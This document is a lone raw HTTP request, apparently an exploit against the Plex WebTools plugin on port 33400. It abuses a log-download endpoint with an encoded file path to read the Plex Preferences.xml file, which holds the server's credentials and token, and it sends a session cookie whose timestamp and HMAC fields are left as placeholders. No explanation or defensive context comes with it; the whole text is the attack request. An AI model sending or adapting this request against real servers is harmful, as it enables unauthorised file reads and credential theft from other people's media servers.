GET /api/v3/logs/download/%2Fconfig%2FLibrary%2FApplication%20Support%2FPlex%20Media%20Server%2FPreferences.xml HTTP/1.1
Host: TARGET:33400
Cookie: WebTools=MQ==|<unix-ts>|<hmac-sha1>
User-Agent: Mozilla/5.0
Connection: close

